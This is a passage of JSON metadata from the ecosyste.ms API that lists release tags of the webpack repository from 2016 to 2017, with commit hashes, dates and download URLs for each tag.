/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fw